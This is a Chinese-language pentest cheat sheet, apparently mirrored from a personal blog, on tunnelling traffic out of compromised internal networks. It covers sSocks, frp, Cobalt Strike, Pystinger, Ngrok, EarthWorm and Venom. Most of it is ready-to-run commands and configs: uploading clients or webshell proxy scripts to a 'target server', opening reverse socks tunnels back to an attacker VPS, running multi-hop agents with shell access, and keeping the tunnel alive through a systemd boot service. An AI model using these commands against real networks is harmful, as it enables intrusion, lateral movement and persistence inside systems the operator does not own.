5

内网流量代理

 2 years ago
source link: https://ssooking.github.io/2020/05/%E5%86%85%E7%BD%91%E6%B5%81%E9%87%8F%E4%BB%A3%E7%90%86/
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.

sSocket

下载地址:https://sourceforge.net/projects/ssocks/

​ 一个socks代理工具套装,可用来开启socks代理服务,支持socks5验证,支持IPV6和UDP,并提供反向socks代理服务。

vps监听1088端口:

rcsocket.exe –l 1088 –p 8888 –vv

内网目标机器执行:

./rssocks –vv –s VPSip:8888

frp下载链接:https://github.com/fatedier/frp/releases

frps上传到服务器上;frpc是要放到目标机上。

1、配置服务端

修改frps.ini服务器端配置文件

[common]
bind_port = 10800

2、配置客户端

修改frpc.ini客户端配置文件:

[common]
server_addr = 110.120.90.80
server_port = 10800

[socks5]
type = tcp
remote_port = 10800
plugin = socks5
use_encryption = true
use_compression = true
先启动服务端:./frps -c ./frps.ini
再启动客户端:./frpc -c ./frpc.ini

nohup sudo ./frps -c frps.ini > log 2>&1 &

4、设置代理工具,连接到vps公网ip的10800端口

5、开机自启

Linux环境下,frp只能通过systemd方式自启。

frp_0.34.3_linux_amd64.tar.gz 解压之后可以看到一个 systemd 目录,将其中的 frps.service 文件复制到服务器的 /etc/systemd/system/ 目录下,并修改 ExecStart=/usr/local/frp/frps -c /usr/local/frp/frps.ini

[Unit]
Description=frpc
Wants=network-online.target
After=network.target network-online.target
Requires=network-online.target

[Service]
ExecStart=/home/pi/github/frp_0.33.0_linux_arm/frpc -c /home/pi/github/frp_0.33.0_linux_arm/frpc.ini
#ExecStart=/home/pi/github/frp_0.33.0_linux_arm/run.sh
ExecStop=/bin/kill $MAINPID
Restart=always
RestartSec=5
StartLimitInterval=0

[Install]
WantedBy=multi-user.target
#重新加载配置文件
sudo systemctl daemon-reload       #service文件改动后要重新reload一下(类似刷新到缓存里)
sudo systemctl enable frp.service  #设置开机启动
sudo systemctl status frp.service  #查询自启状态

CobaltStrike

beacon > socks 1024 #端口根据VPS实际情况进行设置

Cs菜单栏View > Proxy Pivots,复制代理连接到Metasploit中,或直接将socks4a挂在相关安全工具中。

Pystinger

Pystinger

毒刺(pystinger)通过webshell实现内网SOCK4代理, 端口映射.
可直接用于metasploit-framework, viper, cobalt strike上线.
主体使用python开发, 当前支持php, jsp(x), aspx三种代理脚本.

  1. 上传代理脚本到目标服务器

  2. 在目标主机执行命令开启stinger_server服务

    # Windows
    start stinger_server.exe
    
    # Linux
    chmod +x stinger_server && ./stinger_server
  3. 在公网vps上执行命令打通隧道

    ./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000
  4. 此时已经在vps127.0.0.1:60000启动了一个example.com所在内网的socks4a代理

  5. 此时已经将目标服务器的127.0.0.1:60020映射到vps的127.0.0.1:60020

  6. 用proxychains验证socks4a代理是否工作正常

Sunny-Ngrok

官网链接:http://ngrok.cc/

支持HTTPS、TCP、UDP流量转发。使用方式参考官方文档

  1. 首先在Ngrok官网进行账号注册
  2. 注册完进入系统,访问开通隧道,选择免费服务:
  3. 进行隧道配置
    1. 隧道名称:随意
    2. 前置域名:随意,默认域名后缀为ngrok.cc
  4. 配置完毕并添加后,服务器自动分配了一个免费域名用于与目标站点进行映射
  5. 在隧道管理中,点击”客户端下载”,并将客户端工具sunny.exe上传至目标服务器
  6. 在目标服务器执行sunny,建立隧道连接:sunny.exe clientid 隧道id
  7. 此时在公网访问 Ngrok 服务器分配给我们的域名即可访问到服务器。

类似的一个,不过仅支持HTTP(s)和WSS协议:https://natapp.cn/

Earthworm

官网链接:http://rootkiter.com/EarthWorm/

正向socks5代理

./ew -s ssocksd -l 1080

直接代理工具直接设置为目标IP的1080端口即可

反向socks5代理

公网VPS添加隧道,把本地1080端口收到的代理请求转交给8888端口

./ew_linux_x64 -s rcsocks -l 1080 -e 8888

目标主机开启反弹socks服务,连接公网机器

./ew_linux_x64 -s rssocks -d 公网VPS的IP -e 8888

现在通过公网VPS主机的8888端口可以直接访问内网

多级代理

参考官网文档。

venom

官网链接:https://github.com/Dliv3/Venom

多级网络流量代理工具,可进行端口转发、端口复用、交互式shell等。

admin/agent命令行参数

  • admin节点和agent节点均可监听连接也可发起连接

    admin监听端口,agent发起连接:

    ./admin_macos_x64 -lport 9999
    ./agent_linux_x64 -rhost 192.168.0.103 -rport 9999

    agent监听端口,admin发起连接:

    ./agent_linux_x64 -lport 8888
    ./admin_macos_x64 -rhost 192.168.204.139 -rport 8888
  • 节点间通信加密

    Venom提供节点间通信加密功能,用户可通过-passwd选项指定密码,该密码用于生成AES加密所需的密钥。

    # 通过-passwd指定密码为dlive@dubhe
    ./admin_macos_x64 -lport 8889 -passwd dlive@dubhe
    
    # agent指定相同的密码与admin节点连接
    ./agent_macos_x64 -rhost 192.168.0.103 -rport 8889 -passwd dlive@dubhe

About Joyk


Aggregate valuable and interesting links.
Joyk means Joy of geeK